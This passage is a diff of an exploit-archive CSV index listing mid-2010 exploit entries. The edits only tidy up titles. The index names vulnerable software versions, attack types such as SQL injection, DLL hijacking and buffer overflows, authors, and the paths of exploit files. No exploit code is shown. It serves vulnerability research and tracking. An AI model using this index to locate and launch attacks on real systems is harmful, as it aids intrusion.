(Internet Explorer 6/7'",2010-07-31,Dr_IDE,windows,remote,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 @@ -12757,20 +12758,20 @@ id,file,description,date,author,platform,type,port 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14537,platforms/multiple/dos/14537.txt,"Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service",2010-08-03,"Shane Bester",multiple,dos,0 14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0 -14541,platforms/php/webapps/14541.txt,"Wordpress NextGEN Smooth Gallery 0.12 Plugin - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0 +14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 Plugin - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0 14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Exploit",2010-08-04,"Oh Yaw Theng",windows,local,0 14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format Denial of Service",2010-08-03,antrhacks,windows,dos,0 -14566,platforms/windows/local/14566.c,"Microsoft Windows - win32k.sys Driver 'CreateDIBPalette()' Buffer Overflow",2010-08-06,Arkon,windows,local,0 +14566,platforms/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Buffer Overflow",2010-08-06,Arkon,windows,local,0 14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow",2010-08-03,"Nahuel Riva",windows,remote,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 14557,platforms/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps,0 -14555,platforms/windows/dos/14555.py,"Mediamonkey 3.2.1.1297 - Denial of Service (PoC)",2010-08-05,anonymous,windows,dos,0 -14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0 +14555,platforms/windows/dos/14555.py,"MediaMonkey 3.2.1.1297 - Denial of Service (PoC)",2010-08-05,anonymous,windows,dos,0 +14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - (board.php?id=) SQL Injection",2010-08-05,secret,php,webapps,0 14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion",2010-08-05,eidelweiss,php,webapps,0 -14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 +14569,platforms/php/webapps/14569.txt,"joomla Component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 @@ -12779,7 +12780,7 @@ id,file,description,date,author,platform,type,port 14573,platforms/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",linux,dos,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0 -14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 +14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray",2010-08-08,"ThE g0bL!N",windows,remote,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos,0 @@ -12799,7 +12800,7 @@ id,file,description,date,author,platform,type,port 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit",2010-08-10,sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow (PoC)",2010-08-10,anonymous,windows,dos,0 -14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Transversal",2010-08-10,kripthor,multiple,remote,0 +14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14606,platforms/multiple/webapps/14606.html,"Zendesk - Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps,0 @@ -12809,7 +12810,7 @@ id,file,description,date,author,platform,type,port 14610,platforms/windows/local/14610.txt,"Microsoft Windows - Tracing Registry Key ACL Privilege Escalation",2010-08-10,"Cesar Cerrudo",windows,local,0 14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)",2010-08-10,MJ0011,windows,dos,0 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Buffer Overflow",2010-08-11,anonymous,windows,local,0 -14613,platforms/windows/dos/14613.py,"Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 +14613,platforms/windows/dos/14613.py,"Microsoft Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Inclusion",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR - Remote File Disclosure",2010-08-11,Offensive,php,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion",2010-08-11,LoSt.HaCkEr,php,webapps,0 @@ -12817,16 +12818,16 @@ id,file,description,date,author,platform,type,port 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0 -14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow (Post-Authenticated)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 +14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",multiple,webapps,80 -14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - ' Universal' SEH Buffer Overflow",2010-08-12,Dr_IDE,windows,local,0 +14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0 14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 -14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 +14658,platforms/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14636,platforms/php/webapps/14636.txt,"Plogger - Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 14637,platforms/php/webapps/14637.txt,"Get Tube - SQL Injection",2010-08-13,Mr.P3rfekT,php,webapps,0 14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Inclusion",2010-08-13,LoSt.HaCkEr,php,webapps,0 @@ -12838,10 +12839,10 @@ id,file,description,date,author,platform,type,port 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) SQL Injection",2010-08-14,LiquidWorm,php,webapps,0 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)",2010-08-14,fdiskyou,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0 -14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 +14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow Exploit",2010-08-15,dijital1,windows,local,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 -14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 +14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0 14656,platforms/php/webapps/14656.txt,"Joomla Component Jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0 14659,platforms/php/webapps/14659.txt,"Joomla Component OnGallery - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0 @@ -12855,7 +12856,7 @@ id,file,description,date,author,platform,type,port 14671,platforms/windows/dos/14671.py,"Brazip 9.0 - '.zip' Buffer Overflow (SEH)",2010-08-17,ITSecTeam,windows,dos,0 14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,php,webapps,0 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0 -14674,platforms/windows/remote/14674.txt,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 +14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() Off-by-One Overflow",2010-08-18,"Canberk BOLAT",php,dos,0 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service",2010-08-18,"C.G. Tan",windows,dos,0 @@ -12892,9 +12893,9 @@ id,file,description,date,author,platform,type,port 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 14722,platforms/php/webapps/14722.txt,"Joomla 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0 14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 -14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - .pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 +14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 -14728,platforms/windows/local/14728.c,"Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0 +14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0 14730,platforms/windows/local/14730.c,"Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 @@ -12914,7 +12915,7 @@ id,file,description,date,author,platform,type,port 14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0 14750,platforms/windows/local/14750.txt,"VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit",2010-08-25,Secfence,windows,local,0 -14751,platforms/windows/local/14751.txt,"Microsoft Vista - BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0 +14751,platforms/windows/local/14751.txt,"Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 @@ -12923,8 +12924,8 @@ id,file,description,date,author,platform,type,port 14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit",2010-08-25,anonymous,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 -14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 - (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 -14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0 14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0 @@ -12936,7 +12937,7 @@ id,file,description,date,author,platform,type,port 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0 14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0 14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0 -14780,platforms/windows/local/14780.c,"Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0 +14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0 14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0 @@ -12957,9 +12958,9 @@ id,file,description,date,author,platform,type,port 14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) - Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 -14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 - Remote File Inclusion Exploit",2010-08-26,bd0rk,php,webapps,0 +14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 -14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 +14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - CAN BCM Privilege Escalation",2010-08-27,"Jon Oberheide",linux,local,0 14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion",2010-08-27,eidelweiss,php,webapps,0 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 @@ -12971,11 +12972,11 @@ id,file,description,date,author,platform,type,port 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 -14830,platforms/linux/local/14830.py,"nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 +14830,platforms/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - '.wav' Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 -14834,platforms/php/webapps/14834.txt,"Max's GuestBook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 +14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 @@ -13008,11 +13009,11 @@ id,file,description,date,author,platform,type,port 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 -14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 +14887,platforms/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent Cross-Site Scripting Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0 -14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - (.xspf) smb:// URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 -14893,platforms/php/webapps/14893.txt,"PHP classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 +14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - '.xspf' smb:// URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 +14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 14896,platforms/php/webapps/14896.txt,"ijoomla magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0 @@ -13029,11 +13030,11 @@ id,file,description,date,author,platform,type,port 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 - (Joomla) Blind SQL Injection",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 -14915,platforms/php/webapps/14915.txt,"interphoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 +14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0 -14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0 +14923,platforms/php/webapps/14923.txt,"WordPress Events Manager Extended Plugin - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0 14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0 14927,platforms/php/webapps/14927.txt,"dynpage 1.0 - Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps,0 @@ -13046,7 +13047,7 @@ id,file,description,date,author,platform,type,port 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0 14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln, Nullthreat, rick2600",win_x86,remote,80 -14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - .DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 +14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0 14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 - (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 @@ -13068,12 +13069,12 @@ id,file,description,date,author,platform,type,port 14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules NULL Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0 14976,platforms/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 -14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 +14979,platforms/php/webapps/14979.txt,"Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory 